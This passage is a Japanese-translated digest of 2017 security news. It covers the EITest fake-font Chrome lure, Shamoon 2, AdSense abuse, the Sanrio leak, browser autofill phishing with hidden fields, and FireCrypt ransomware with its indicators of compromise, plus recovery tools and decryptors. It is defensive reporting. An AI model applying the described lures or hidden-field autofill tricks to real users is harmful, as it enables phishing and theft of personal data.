     「あなたは、感染したマシン上に存在するファイルは一つとして、もはや信頼できない」と、Scottはブログに記述すると共に、最新のVirLockerの動作方法を詳細に説明している。以下が、VirLocker脅迫画面のスクリーンショットである。


    Chromeのユーザは、新たな"Font Wasn't Found"(フォントが見つかりません)テクニックでマルウェアの標的にされていた
    BleepingComputer : News>Security (2017/01/18)


    Google Chromeでのポップアップ。疑わしいフォント アップグレードパッケージをダウンロードするように要請している

     Google Chromeのユーザは、彼等のブラウザのフォント アップグレードパッケージ(まず間違いなく、マルウェアが混入されている)をダウンロードするように、彼等を欺こうとするWebサイトに警戒する必要がある。
     この感染テクニックは、Proofpointの研究者によって発見された。彼等は、Windows上のChromeユーザだけ、特定の国の人々だけ、そして、彼等が検索エンジン結果のような、特定のルートを使用してセキュリティ侵害されたWebサイトに移動してきた場合にだけ標的にされると発言している。

    攻撃者はHTMLタグを置き換え、Webページを破壊している

     このテクニックは、攻撃者がWebサイトをセキュリティ侵害し、そのサイトのソースコードに独自のスクリプトを追加することに依存している。
     これらのスクリプトは、入力トラフィックを除去し、Windows上のChromeユーザにだけ別の悪意あるスクリプトをロードする。
     この二つ目のスクリプトは、HTMLタグを"& # o,"で置き換え、そのサイトのコンテンツを破壊し、ページ全体を�文字で表示する。
     この文字列は、Webサイトやフォントと文字列のレンダリング問題があるソフトウェ中で、しばしば遭遇する。そこで、犯罪者は、指定のフォントが彼等のデバイス上に見つからないので、ユーザはフォント パッケージアップデートをダウンロードしインストールする必要があると、ユーザに告げるポップアップを表示する。
     このポップアップを正当なものと見せかけるために、このポップアップは、Google Chromeのロゴを記載し、公式のGoogle Chrome Webサイトに観られるようなクラシックなボタン形式を使用している。感染経路全体を示すGIFは以下で利用可能である。


    ChromeユーザをターゲットにしているEITest感染経路

     Proofpointによると、このテクニックは、EITest感染経路の一部として、通常ハックされたサイトで発見される。EITestは、pseudo-Darkleech(擬似Darkleech(【訳注】 何千というApacheサーバに感染する、2012年に始まった攻撃の名前))と類似のマルウェア感染経路に与えられたニックネームである。
     EITestの背後にいるグループは、既知の脆弱性を使用して、多大な数のWebサイト(通常はWordPressやJoomla)をセキュリティ侵害する作業をしている。
     彼等は、これらのサイトから少量のトラフィックを盗み、そのトラフィックを悪意あるペイロードにリダイレクトするように挙動している。
     このEITest作戦は、2014年に現れ、時間を通じて、最終ペイロードは大きく変化した。EITestグループは、複数の他のサイバー犯罪活動へ彼等のトラフィックソースを貸し出していると仄めかしている。
     その存続期間の大部分に関して、EITestグループは、脆弱性悪用キットのオペレータ(ユーザが何ら間違いに気がつくことなく、ユーザのデバイスに自動的にマルウェアをインストールするためにFlash, Silverlight, IEや他の脆弱性を使用している者共)にトラフィックを貸し出していた。

    Chromeユーザは、Fleercivetクリック詐欺マルウェアに感染させられる

     これら最近のChromeユーザへの"font wasn't found"攻撃は、彼等がダウンロードボタンをユーザがクリックすることに依存しているために、同じハイレベルでの感染の成功を保証している他の脆弱性悪用キットとは異なっている。
     Proofpointは、このテクニックを介してユーザがダウンロードしたフォント アップデートパッケージは、Fleercivetクリック詐欺マルウェアに感染させられている。このマルウェアは、予め設定されているURLに移動させ、金銭を得るためにユーザには見えないように置かれている広告をクリックさせるように動作する。
     この同じマルウェアは、2015年の初めにはSimbyで、2015年後半と2016年はClicoolの名前で地下の犯罪サービスで広告されていた。

    CryptoSearch: 身代金要求型マルウェアによって暗号化されたファイルを発見し、新しい場所に移動するツール
    BleepingComputer : News>Security (2017/01/15)


     セキュリティ研究者Michael Gillespieが、身代金要求型マルウェアに感染した犠牲者を支援するための新しいWindowsアプリケーションを開発した。
     CryptoSearchろ名付けられたこのツールは、幾つかのタイプの身代金要求型マルウェアファミリーによって暗号化されたファイルを同定し、ロックされたファイルを復元する復号プログラムが将来リリースされることを期待して、ファイルのコピーと新しい場所に移動するオプションとをユーザに提供するものである。  Gillespieは、復号できない身代金要求型マルウェアによって感染させられたコンピュータの回復兼クリーニング ユーティリティとして、このアプリケーションを開発した。
     何れにせよ、PCの所有者がロックされたファイルを復元するのは不可能なので、最善の方策は、暗号化された全てのデータをバックアップドライブに移動し、セキュリティ研究者が、その身代金要求型マルウェアの暗号化を解く方法発見するまで待つことである。
     全ての暗号化されたファイルを集めるということとは、話を異にする。身代金要求型マルウェアは、フォルダではなく、或るタイプのファイルを暗号化することを仕事にしているので、犠牲者は通常、暗号化されたファイルを、幾つかの中央集権的な場所ではなく、彼等のPC全体に分散して持っている。
     ここでCryptoSearchが役に立つ。このツールは、この検索プロセスと、これらのファイルを新しい場所に移動することを自動化している。この操作が終了し、PCの所有者が暗号化されたデータのバックアップを持ったなら、身代金要求型マルウェアによって暗号化されたファイルを削除することによって、コンピュータをクリーンアップしたり、敢えて、ハードドライブ全体を消去し、OS全体を再インストールすることができる。

    CryptoSearchは、ID Ransomewareと共同して作業する

     内容を具体的に見ると、CryptoSearchは、ID Ransomewareサービスと提携して作業している、これは、あなたがこのアプリケーションを実行している時、オンラインにいる必要がある。(【UPDATE】 この記事が公開された後、程なくして、Offline Modeのサポートが追加された)
     Gillespieによると、CryptoSearchは、ユーザのPCをロックした身代金要求型マルウェアのタイプを同定するために必要なデータを取得するために、ID Ransomewareをクエリーする。



     「このプログラムは、私が提供するID Ransomewareによって稼働されている、そこで、最新の判明した身代金要求型マルウェアとそのシグネチャーで、常に定義ファイルがアップデートされる」と、Gillespieは、本日、彼が公式にこのアプリケーションを起動した場所であるBleeping Computerフォーラムに記述しいている。
     「CryptoSearchを最初に起動すると、このアプリケーションは、そのWebサイトにコンタクトし、既存の拡張子とバイト パターンに関する最新情報をダウンロードする」とし、更に、「既知のファイルパターンや拡張子によってファイル(一部の変種に関しては、暗号化されたファイル中の16進数パターン)を同定する。」
     CryptoSearchは、ローカルファイルの検索に、このデータベースを使用し、身代金要求型マルウェアの感染を同定し、次に、その身代金要求型マルウェアによってロックされた全てのファイルを発見する。


     CryptoSearchが、全てのファイルを特定すると、ユーザは、メニューでプロンプトされ、ファイルを移動しコピーしたいのか否か尋ねられ、次に、暗号化されたデータを何処に保管するのか尋ねられる。
     Gillespieは、CryptoSearchは、本来のフォルダ構造を維持してファイルを転送する高性能な方法であると発言している。例えば、C:\Test\Folder で発見されたファイルは、J:\Backup\C\Test\Folder に移動されるだろう。



     CryptoSearchは現在、ベータ開発ステージである、これは将来より多くの機能が追加されることを意味している。
     現在要求されている機能の一つは、ID Ransomewareデータベースの静的なコピーを含む「オフラインモード」である(【訳注】 上述のUpdateでも述べたように、この機能は既に追加されています)。これで、CryptoSearchは、インターネット接続なしに使用することができるようになる。
     それらをオフラインで入手することによって、コンピュータを隔絶することは、身代金要求型マルウェア感染の場合の標準的技法なので、ユーザは、この機能を求めていた。この機能に関するスケジュールが存在していないので、あなたは、GillespieのTwitterやBleeping Computerのフォーラム トピックに目を光らせておく必要がある。CryptoSearchは、コチラからダウンロードできる。


    気をつけろ! 死から復活した非常なマルウェアは、今、仮想マシン・キラーである
    Fossbytes : Security (2017/01/11)


     概要: Palo Alto Networksのセキュリティ研究者は、2011年にSaudi Aramco(【訳注】 サウジ・アラムコ、サウジアラビア国営の石油会社)の35000のマシンを攻撃したShamoon類似のマルウェアの二つのバージョンを発見した。Second Shamoon 2として知られる、この最新のバージョンは、2016年11月に発見された。これは、サイバースパイ活動を引き起こし、標的のネットワーク上で動作している仮想マシンにダメージを与えることが知られている。

     サイバースパイ活動として知られる悪名高きShamoon(別名 Disttrack)マルエウェアが復活した。そして、以前より進歩し、仮想マシンを削除する能力を加えている。
     Shamoonは、ローカルネットワーク上で拡散する能力を持っている。このマルウェアは、コンピュータの特定の場所からファイルの一覧を収集し、そのファイルを削除する前に攻撃者に、それを送信する。このマルウェアは、マシンをアクセス不能にするためにMBR(マスター・ブート・レコード)を上書きする。


    MBRを変更され、OSを発見できなくなっているシステム

     Shamoonは、サウジアラビアを本拠とするSaudi Aramco石油会社を攻撃するために使用され、35000のマシンに影響を与えた2012年が初出のようである。これらのマシンをオンラインに復帰させるために、凡そ一週間を要した。'Shamoon 2' と名付けられた、このShamoonマルウェアの新たなインスタンスに光が当てられたのは2016年11月である。このマルウェアは、サウジアラビアを本拠とする他の企業を攻撃するために使用され、2016年11月17日に、システムを削除するように設定されていた。
     'Second Shamoon 2' と呼ばれる類似のペイロードは、Palo Alto Networksのセキュリティ研究者によって11月に再び発見された。そして、これもまたサウジアラビアをターゲットにしていた。この研究者は、Second Shamoon 2が、犠牲者の組織に関連したハードコードされたアカウント認証を含んでいることに気がついた。この挙動は、先行したShamoon 2では観られていない。
     これらのユーザ証明書が、Windowsのパスワード複雑性の要求を満たしているという事実は、最新の攻撃のためにユーザ名とパスワードを収穫するために使用された11月17日に類似した未知の攻撃を、この研究者に、想起させている。
     また、公式のドキュメントの一部として、このアップデートされたShamoonは、Huawei(【訳注】 ファーウェイ、中国・広東省深センに本社を置く通信機器メーカー(Wikipediaより))デスクトップ仮想化製品(仮想デスクトップ・インフラストラクチャを作成するために使用されるFusionCloudのような)用の管理者アカウントユーザ証明書を含んでいる。これらの仮想システムは、仮想デスクトップ・インターフェース・スナップショット(このマシンの内容が削除される前に作成されるバックアップ)を簡単にすることによって、Shamoonのようなマルウェアに対する保護を提供するものとして知られている。
     ターゲットになっている組織が、彼等のHuawei VDIシステムをセットアップするために、この証明書を使用している可能性がある。この攻撃者達は、この仮想マシンの保護を無効にすることで攻撃強度を増加しようとしてそれらを含めたのだろう。攻撃者達が、証明書を取得するために以前の攻撃を起動したのか否か、あるいはパスワードを推測するために当てずっぽうに矢を補ったものなのか定かではない。
     更に、この研究者達は、サウジアラビア現地時間11月29日午前1時30分にシステムを削除するようにスケジュールされ、マルウェアを拡散するために使用される媒体に気が付いていない。その時点で、職員が、その組織に存在しているはずがないので、検出とあらゆる対策の開始に時間がかかることになった。
     Second Shamoon 2に関する詳細を知りたいのなら、オリジナルのブログ ポストを読みなさい。


    二つの攻撃的キャンペーンに、疑うことを知らないユーザをフィッシングしようとするGoogle Adsが検出された
    BleepingComputer : News>Security (2017/01/11)
     此処数週間に渡り、SucuriとMalwarebytesのセキュリティ研究者は、犯罪者に利益をもたらすために、Google Adsを押し付け、ユーザを欺いてクリックさせる、ハッキングされたWebサイトやインチキのWebサイトを乱用している二つのキャンペーンを発見した。
     無関係と思われるこの二つのキャンペーンで、犯罪者はAdSense(Webサイトの所有者が、彼等のサイト上に広告を挿入することを可能にするGoogleのサービス)を悪用している。

    過度に攻撃的な広告を挿入するためにサイトをハッキングする

     一つ目のキャンペーンは、Sucuri(Webセキュリティに特化された企業)のセキュリティ研究者によって検出された。
     この企業の専門家は、ハッキングされ、コンテンツのトップに巨大な広告パネルを表示された一連のWebサイトを調査するために招集されている。


    過度に攻撃的なGoogle AdSense広告

     これらのサイトの所有者は、この広告パネルが表示される方法を発見するための難しい時期を持った。Sucuriによると、攻撃者はサイトをセキュリティ侵害し、Webサイトのソースコード内に手動でJavaScriptコードを挿入するか、自動的にJavaScriptコードをロードするために、コアCMSファイルを変更した。
     これらの攻撃は或る特定のプラットフォームを標的にしているわけではなく、攻撃者は、 WordPress, Joomla, Magentoを実行しているサイト、並びにstatic HTMLのサイトでさえセキュリティ侵害していた。
     或る場合には、攻撃者は、ソースファイルを編集するのではなく、ウィジェットを使用して悪意あるコードを、そのサイトに追加することで、WordPress管理者アカウントをセキュリティ侵害していたかのようである。
     Sucuriによると、この巨大な広告は、セキュリティ侵害されたサイトのモバイルとデスクトップの両バージョンで表示されている。
    更に、彼等の広告を表示するためにハッカーによって使用された攻撃的テクニックのために、Googleが誰かにペナルティを科そうとした場合には、皮肉にも、公式なAdSenseのポリシー("every publisher is responsible for the content of a site on which their ad code is placed,"。Google日本語サイトでの和訳は、「なお、広告コードを配置したサイトのコンテンツについては、各サイト運営者様の責任となりますのでご注意ください。」)により、正当なサイトの所有者に科されることになる。
     このポリシーは続けて、"If a site is found in violation of our policies, we will notify any publisher(s) whose ad code is on the site," (Google日本語サイトでの和訳は、「サイトが AdSense のポリシーに違反していることが発覚した場合、Google は、そのサイトに広告コードを配置しているすべてのサイト運営者様に通知いたします。」)としている。これらのハッキングを発見したSucuriの専門家Denis Sinegubkoによると、「攻撃者のIDは、サードパーティのサーバから自動的にロードされているので、あなたが、そのサイトを調査すれば、各サイト運営者の正当なIDは簡単に発見することができる」としている。

    クリックベイト ブログはアダルトポータルを装い、ユーザのクリックを収穫している

    【訳注】 クリックベイト(Clickbait): わざと扇情的な見出しや刺激的なサムネイル画像をつけてネットユーザーのクリックを誘うウェブページやリンクや動画や広告などのこと(英語ネットスラング辞典より)

     AdSense広告を攻撃的に押し付けてくる二つ目のキャンペーンは、Malwarebytesによって発見された、そして、このキャンペーンはハッキングされたWebサイトに関係していなかった。
     このキャンペーンはShady(正当なサイトのコンテンツをスクラップすることによって作成されている)ブログに関連している。犯罪者は、Googleや他の検索エンジンを欺き、これらのWebサイトを上位に表示する様々なブラックハットSEO(【訳注】 悪質な手法を駆使して検索結果を上位に表示するテクニック(IT用語辞典BINARYより))テクニックを使用して、このサイトにWebトラフィックを突っ込ませている。
     トラフィック フィルタリングシステムを介して、犯罪者は検索エンジンボットと実際のユーザを、そして、そのサイトにリダイレクトで来たユーザと手動でURLをタイプしてやって来たユーザ(セキュリティ研究者)とを識別している。
     ボットと、そのブログのURLを手動入力したユーザは、本来の状態でそのブログを見ることになるが、リダイレクトでこのサイトに到達したユーザは、その本来のブログはインチキのアダルト ポータルを表示するオーバーレイによって隠されることになる。
     このアダルト・ムービーを再生しようとして、そのサイト上のビデオの一つをロードしているユーザは、意識することなく、このサイトの所有者によって非表示にされている隠された広告をクリックすることになる。


    ユーザを欺き非表示の広告をクリックさせようとしているインチキのアダルト・ポータル

     基本的に、そもそもアダルトサイトを訪問したくないユーザは、ビデオ以外のところで遊ぼうとするが、実際には非表示の広告をクリックしている。
     そして、広告会社は、多くの人々がAdBlockerをインストールしていることを不思議に思っているだろう。


    盗まれていたHello Kittyファン330万のデータがオンラインに公開された
    Sophos : Hot for Security (2017/01/11)
     2015年12月、セキュリティ研究者Chris Vickeryは、親会社Sanrioの不注意により、数百万のHello Kittyファンがリスクの下にあることを明らかにした。これはSanrioが、公にアクセス可能なMongoDB上に重要なアカウントの詳細を放置したままにしたことにあった。
     幸いなことに、金融関連データはリスクに晒されてはいないようである。
     しかし、晒された情報には、sanrio.comユーザの名前、彼等の誕生日、性別、出生国、eMailアドレス、ソルト(【訳注】 ソルトは、復号を困難にするために暗号化の間にランダムな文字列を追加する方法)されていなパスワード ハッシュ、パスワードのヒントと答え等を含んでいた。
    通常の事態でも十分酷いものであるが、あなたが世界中のHello Kittyの数百万の若いファンに思いを馳せた時、特に身を凍らせることになる。
    しかしながら、Sanrioは、そのユーザデータベースの設定を安全に確保していたので、如何なるデータも盗まれていはいないと確信すると関係者に断言していた。

     「更に、新しいセキュリティ基準が、このサーバに適用される。そして、我々は、この事件の内部調査とセキュリティ検証を実施する。会社の現在の認識としては、盗まれたり、晒されたりしているデータはない。」

     一年前に戻ってみると、我々は、あまりに楽観的であったかのようである。
     この週末、CSO Onlineのレポートとして、3,345,168ユーザのデータベースがオンラインに晒された。これは、結局、十分に安全が確保されていないデータを入手していた者が「実行」したことを示している。
     このレコードの186000を超えるものが、18歳未満である。
     Sanrioが2015年にデータが盗まれた証拠はないとした事実は、万事順調であるとする証明にはなっていなかった。
     それで、どう対処すればいいのか? 2015年に戻る。Sanrioはユーザにパスワードを変更するようにアドバイスしたが、いったい、どれだけの人が、このアドバイスを聞き、行動したのか疑わざるを得ない。
     もちろん、SanrioのWebサイトで使用されているあなたと子供のパスワードが、他の如何なるWebサイトでも使用されていないということは極めて重要である。パスワードは、それらが難解であり、且つ一意である場合を除き、安全とは考えることはできない。
     これが、私が多くの人々にパスワードマネージャ(あなたに代わってパスワードを思い出してくれて安全にパスワードを格納してくれるだけでなく、新しいオンラインアカウントを作成する度に、本当に、ランダムで複雑なパスワードを生成してくれるソフトウェア)を推奨する理由である。
     他方、Sanrioのような会社は、彼等のオンラインデータベースを適切に確保しておく重要性に目覚める必要がある。我々は現在、MongoDBデータベースの大変多くの誤った設定のために、多くの組織が、認証されていないユーザに、そのデータベースを開き放なしのままにされていることを学習している。


    ブラウザの自動補完機能が、新しいフィッシング攻撃で個人情報を盗むために使用されていた
    The Guardian : Technology (2017/01/10)
     あなたのブラウザやパスワードマネージャの自動補完機能は、サイト上で非表示にしたテキストボックスを使用している無節操なフィッシング詐欺師に、あなたの情報を気づかずに与えているかもしれない。
     フィンランド人のWeb開発者兼ハッカーViljami Kuosmanenは、Google Chrome, Apple Safari, Operaを含む幾つかのWebブラウザ、並びに幾つかのプラグインやLastPassのようなユーティリティを欺いて、プロファイルに基づいた自動補完システムを介してユーザの個人情報を与えることができることを発見した
     このフィッシング攻撃は、驚くほど単純である。ユーザが、幾つかの単純なテキストボックスに情報(名前やeMailアドレスのような)を書き込もうとするとき、自動補完システム(アドレスのような標準的な情報の飽き飽きする繰り返しを回避することを目的とする)は、他のプロファイルに基づいた情報を任意の他のテキストボックスに挿入しようとする(これらのボックスがページ上で非表示になっている場合でさえ)ことを、Kuosmanenは発見した。
     これは、ユーザが一見した所危険がないと思われる基本情報をサイトに入力すると、この自動補完システムは、同時に、ユーザが確認すべきより重要な情報を与えことになることを意味している。Chromeの自動補完システム(DefaultでONになっている)は、eMailアドレス、電話番号、メーリングアドレス、組織、クレジットカード情報、その他様々な細々とした情報を格納している。

    Viljami KuosmanenのTwiiter(デモンストレーション付き)

     Kuosmanenは、ユーザ名とeMailアドレス用のテキストボックスを表示し、Chromeによって自動補完される非表示の住所と電話番号用のテキストボックスの付いたサイトを立ち上げ、この問題をデモンストレーションしている。
     Mozilla Firefoxは、マルチボックス自動補完システムを未だ搭載していないので、この問題の影響は受けないし、プログラム的な手法でテキストボックスを満たすように欺かれることはないと、Mozillaの主幹セキュリティエンジニアDaniel Veditzは、発言している。しかしながら、より完成された自動補完システムが、Firefox用に現在開発されている。
     このフィッシング攻撃は依然として、少なくとも幾つかの情報をオンラインのフォームに入力するように欺かれたユーザに依存しているが、疑うことを知らないユーザは、彼等が予期しているより比較的簡単に入力するように欺かれるだろう。
     ユーザは、彼等のブラウザや拡張の設定で、この自動補完システムを無効化することによって、この種のフィッシング攻撃から自分自身を保護することができる。


    FireCrypt身代金要求型マルウェアがDDoSコンポーネントを搭載
    BleepingComputer : News>Security (2017/01/04)
     FireCryptという身代金要求型マルウェア ファミリーは、ユーザのファイルを暗号化し、ソースコード中にハードコードされているURLに関する大変貧弱なDDoS攻撃を起動しようとしている。
     この脅威は本日、MalwareHunterTeamによって発見された。以下は、MalwareHunterTeamとBleepingComputerのLawrence Abramsによって提供された、この身代金要求型マルウェアの動作モードの解析である。

    FireCryptは、身代金要求型マルウェア構築キットを感じさせる

     マルウェアは通常ソースコードからコンパイルすることで、あるいは、特定のインプット パラメータを取り、作戦ベースでカスタマイズされたマルウェア ペイロードを出力する自動化ソフトウェアを使用して生成される。
     後者は、この業界ではマルウェア ビルダーとして知られており、通常コマンドライン アプリケーションもしくはGUIベースのツールとして提供される。
     FireCrypt身代金要求型マルウェアの製作者は、FireCryptのサンプルを組み立てるプロセスを自動化するコマンドライン アプリケーションを使用している。これは、ソースコードをコンパイルする巨大なIDE(統合開発環境)を操作する必要なしに、彼が基本設定を編集することを可能にするためである。
     FireCryptのビルダは、BleedGleen(下図参照)と名付けられており、このFireCryptの製作者が一意の身代金要求型マルウェア実行ファイルを生成し、それに任意の名前を与え、個別のファイルアイコンを与えることを可能にする。他の身代金要求型マルウェア ビルダと比較すると、これは大変ローエンドなアプリケーションである。類似のビルダは通常、犯罪者が広汎なオプションのセット(支払いを受け取るBitcoinアドレス、身代金要求額、コンタクト用のeMailアドレス等)をカスタマイズすることが可能である。




     このビルダの役割は、EXEファイルをPDFやDOCアイコンで偽装する他に、新しいコンパイル毎に異なるハッシュでファイルを生成するために、この身代金要求型マルウェアのバイナリを僅かに変更することでもある。このテクニックは、標準的なアンチウィルスで検出されることを難しくする「ポリモーフィック マルウェア」と呼ばれるものを作成するために、マルウェア開発者によってしばしば使用される。MalwareHunterTeamによると、「このビルダは大変基本的なので、実際のアンチウィルスに対抗する助けにはならない。
     そう言っても、これは、FireCryptの製作者が少なくともマルウェアの開発において、ある種の経験を持っていることを、GitHubからオープンソースの身代金要求型マルウェアをダウンロードする、よくあるスクリプトキディ(【訳注】 ウェブで入手できるクラッキング・ツールだけを使う、スキルのないクラッカ(コンピュータ用語辞典より))ではないことを我々に告げている。

    FireCrypt感染プロセス

    FireCryptの感染プロセスは、この身代金要求型マルウェアの配布者が生成したEXEファイルを起動する際にユーザを欺くための能力で決まる。
     これを根拠として、FireCryptは、そのコンピュータのTask Manager(taskmgr.exe)を停止し、20のファイルタイプのリストに基づいて暗号化を開始する。FireCryptは、AES-256暗号化アルゴリズムでファイルを暗号化する。
     全ての暗号化されたファイルは、オリジナルのファイル名の拡張子に".firecrypt"拡張子が追加される。例えば、photo.pngと名付けられているファイルは、photo.png.firecrypt にリネームされる。


     ファイルの暗号化が終了すると、FireCryptは、そのユーザのデスクトップに脅迫文を投下する。


    FireCryptの脅迫文

     この脅迫文は、同じMalwareHunterTeamによって昨年の10月14日に発見されたDeadly for a Good Purpose身代金要求型マルウェアの脅迫文と殆ど同一のコピーである。


    Deadly for a Good Purpose身代金要求型マルウェアの脅迫文(画像をクリックすると拡大します)

     2016年10月に発見された時点では、Deadly for a Good Purpose身代金要求型マルウェアは開発段階であり、そのソースコードは、犠牲者のコンピュータの日付が2017年の日付になる、もしくは、それ以降にだけファイル暗号化プロセスを始めるようになっていた。
     FireCryptと比較すると、唯一の相違点はDeadly for a Good Purposeが脅迫文のトップにロゴを示していることである(現在FireCryptにはロゴはない)。しかし、Deadlyのソースコードの詳細な検証で、MalwareHunterTeamは、この二つの身代金要求型マルウェアのバージョンが、同一のeMailアドレスとBitcoinアドレスを使用していることを発見した(この二つの間に明らかな関連性を示している)。FireCryptは、オリジナルのDeadly for a Good Purpose身代金要求型マルウェアのリブランドである。


    画像をクリックすると拡大します

    ハードドライブをジャンクファイルで満たすDDoS機能

     脅迫文を投下した後も、FireCryptは悪意ある挙動を停止しない。このソースコードは、途切れることなくURLに接続し、そのコンテンツをダウンロードし、それを%Temp%フォルダの[random_chars]-[connect_number].htmlと名付けられたファイルに保存する。
     ユーザがこの機能に気が付かない場合、FireCryptは、素早く%Temp%フォルダをジャンクファイルで充満するだろう。
     FireCrypt身代金要求型マルウェアの現在のバージョンは、http://www.pta.gov.pk/index.php のコンテンツをダウンロードする。このURLは、Pakistan's Telecommunication Authority(パキスタン通信省)の公式ポータルである。このURLは、身代金要求型マルウェアのビルダを使用して改竄することはできない。


    FireCryptのDDoS機能

     FireCryptの製作者は、この機能を"DDoSer"と呼んでいるが、これは無理だろう。この犯罪者は数千の犠牲者に感染した後、十分な大きさのDDoS攻撃を仕掛け、当局のWebサイトに何らかの問題を引き起こすことができる。
     更に、全て犠牲者は同時に感染させられており、DDoS攻撃に参加するためには、彼等のコンピュータがインターネットに接続されていなければならない。
     記述している時点で、FireCryptで暗号化されたファイルを復元する方法は知られていない。この脅威の感染者で 500 USD(約58000円)の身代金を支払うことができない、もしくは支払う意思がない犠牲者は、将来復号プログラムがリリースされる可能性があるので、暗号化されたファイルの全てのコピーを保持しておきなさい。

    標的とされているファイル拡張子

    .txt, .jpg, .png, .doc, .docx, .csv, .sql, .mdb, .sln, .php, .asp, .aspx, .html,
    .htm, .csx, .psd, .aep, .mp3, .pdf, .torrent

    FireCrypt身代金要求型マルウェア関連ファイル

    %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\[random_chars].exe - Startup Executable
    %Desktop%\[random_chars]-READ_ME.html - Ransom Note
    %AppData%\SysWin32\files.txt - List of Encrypted Files
    %Desktop%\random_chars]-filesencrypted.html - List of Encrypted Files
    %Temp%\random_chars]-[connect_number].html - Files downloaded during the DDoS attack

    FireCrypt身代金要求型マルウェア関連ハッシュ

     BleedGreenビルダ(VirusTotalのスキャンは、現在 2/57 を検出している)
    SHA-256: e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d
     FireCrypt身代金要求型マルウェアのバイナリ サンプル(VirusTotalのスキャンは、現在 13/57 を検出している)
    SHA-256:757e3242f6a2685ed9957c9e66235af889a7accead5719514719106d0b3c6fb4

    eMailアドレスと支払い用連絡先

    EMAIL: gravityz3r0@sigaint.org

    Emsisoftが、Globe身代金要求型マルウェア バージョン3用の復号プログラムをリリースした
    BleepingComputer : News>Security (2017/01/04)
     また再び、EmsisoftFabian Wosarが救出に現れ、Globe身代金要求型マルウェア v.3用の復号プログラムをリリースした。この復号プログラムは、暗号化されたファイルに .decrypt2017 と .hnumkhotep 拡張子を一般的に追加するGlobe身代金要求型マルウェアの変種を復号する。この身代金要求型マルウェアはまた、下の画像に類似した脅迫文を表示する。
     この復号プログラムを使用するには、暗号化されたファイルと、同じファイルで暗号化されていないものの二つを必要とする。この二つのファイルを使用して、この復号プログラムは復号鍵を決定し、あなたのファイルを修復する。この復号プログラムの使用する方法の説明は後述する。


    Globeの脅迫文

    Globe身代金要求型マルウェア v.3 を復号するには

     あなたが、この身代金要求型マルウェアに感染したのなら、単純に、下のリンクから decrypt_Globe3.exe をダウンロードし、それをデスクトップに保存しなさい。

    Decrypt Globe3ダウンロード

     復号鍵を発見するには、同じファイルの暗号化されたファイルと暗号化されていないファイルの両方を同時に decrypt_Globe3.exe アイコン上にドラッグする必要がある。あなたが一つのファイルの暗号化されたバージョンと暗号化されていないバージョンの両方を選択したら、その両方を、この実行ファイル上にドラッグしなさい。この復号プログラムを使用するためのファイルを見出そうとするなら、C:\Users\Public\Pictures\Sample Pictures フォルダ中に見出されるサンプル画像(【訳注】 あなたのピクチャ フォルダに存在しているサンプル画像。このファイルも暗号化されている場合は、同一のファイルを知人や会社からもらってきてください)を使用することができる。ファイルのサイズに着目し、暗号化されていないサンプル画像と、同じサイズの暗号化されているサンプル画像を選択する。
     このペアのファイルを暗号化するために使用された復号鍵が判明したら、この鍵は、あなたのコンピュータ上の暗号化された他の全てのファイルを復号するために使用することができる。
     私が同時に二つのファイルをドラッグするという意味を理解するには、以下に示すアニメーション画像を参照しなさい。この鍵を作成するために、私は暗号化されたPNGファイルと同じファイルの暗号化されていないバージョンと、decrypt_Globe3.exeプログラムを含むフォルダを作成した。ここで、通常のPNGファイルと、その暗号化されたバージョンの両方を同時に復号プログラムにドラッグした。


    この復号プログラムにファイルをドラッグする方法

     このプログラムが起動する時、あなたは以下に示すUAC(User Account Control、ユーザアカウント制御)が表示される。先に進むには Yes ボタンをクリックする。


    UACプロンプト

     この復号プログラムは、復号鍵を見つけるためにブルートフォース(【訳注】 総当り)を開始する。これには暫く時間がかかるので、我慢されたい。


    短い説明文

     鍵がブルートフォースで発見されると、このプログラムは、以下のような新しいウィンドウを表示する。


    発見された復号鍵

     この復号鍵でファイルの復号を開始するには、OKボタンをクリックする。そうすると使用許諾書が表示される。続けるには Yes をクリックする。これで、復号されるドライブのリストを表示している、この復号プログラムのメインスクリーンが表示される。(【訳者補注】 暗号化されているファイルが存在するにも拘わらず)そのドライブレターが表示されていない場合には、Add Folderボタンをクリックし手動で、そのドライブレターを追加しなさい。


    Globe3復号プログラムのメイン画面

     復号したい全てのフォルダを追加したら、復号プロセスを開始するためにDecryptボタンをクリックする。Decryptをクリックすると、このプログラムは、暗号化されたファイルの全てを復号し、以下のような結果を示す画面で復号状況を表示するだろう。


    ファイル復号中

     終了するとResultタブがFinishedを宣言する。あなたのファイルの全てはこれで、復号されているはずである。あなたがこの復号プログラムで作業するための支援を必要としているのであれば、我々のGlobe Ransomware Support Topicで質問しなさい。


    KasperskyのHTTPSトラフィック検査システム中に深刻なセキュリティフローが発見された
    BleepingComputer : News>Security (2017/01/04)
     Google Project Zeroの最も熟達したセキュリティ研究者の一人であるTravis Ormandyは、Kasperskyのセキュリティ製品がWebの脅威に関してHTTPSトラフィックを検査する方法中に二つの問題を特定した。
     この研究者によると、このKaspersky製品は、このシステム公認の認証ストア中の信頼される認証局(CA)として、ルート認証(Kaspersky Anti-Virus Personal Root)を使用している。
     ユーザがHTTPSを介してホストされたWebリソースにアクセスする度に、Kasperskyセキュリティ ソフトウェアは、全てのSSL接続をプロキシし、あらゆる脅威に関して入接続をスキャンするために独自の(リーフ)認証を配備している。
    このトラフィックは暗号化されたままであるが、認証はKasperskyのルート認証によって発行されているようである。

    Kasperskyセキュリティ製品は、あるユーザに関してHTTPS接続を破壊していた

     此処がOrmandyが最初の問題を発見した所である。Kasperskyはクローンされたリーフ認証用のキーとして実際の認証のMD5ハッシュ冒頭の32ビットを使用している。
     ユーザがHTTPSリソースに(再)アクセスすると、このアンチウィルスは、このMD5シグネチャを検索し、同じクローンされたリーフ認証を再使用する。
     「あなたは32ビットキーを理解する暗号解読者になる必要はない。32ビットキーでは数秒でコリジョンする(【訳注】 データのハッシュ値と同じハッシュ値を見つける)ブルートフォースを妨げるには不十分である。事実、任意の他の認証でコリジョンを生成することは些末なことである」と、昨日公開したバグレポートでOrmandyは説明している。
     現実世界の例として、Ormandyは、HackerNews(news.ycombinator.com)サイトとコネチカット州マンチェスターのポータル(manchesterct.gov)用認証の32ビットキーは同一であると発言している。
     Ormandyは、このバグが、多くのKasperskyユーザのHTTPS接続を破壊し、安全なWebサイトへのアクセスを不可能にしたり、代わりにHTTPを使用するダウングレードしたWebサイトへのアクセスを余儀なくしていたと明らかにしている。


     Ormandyが発見した二つ目のバグは、Kaspersky製品がインストールされている各コンピュータにKasperskyが追加しているルート認証の秘密鍵ファイルに関連している。
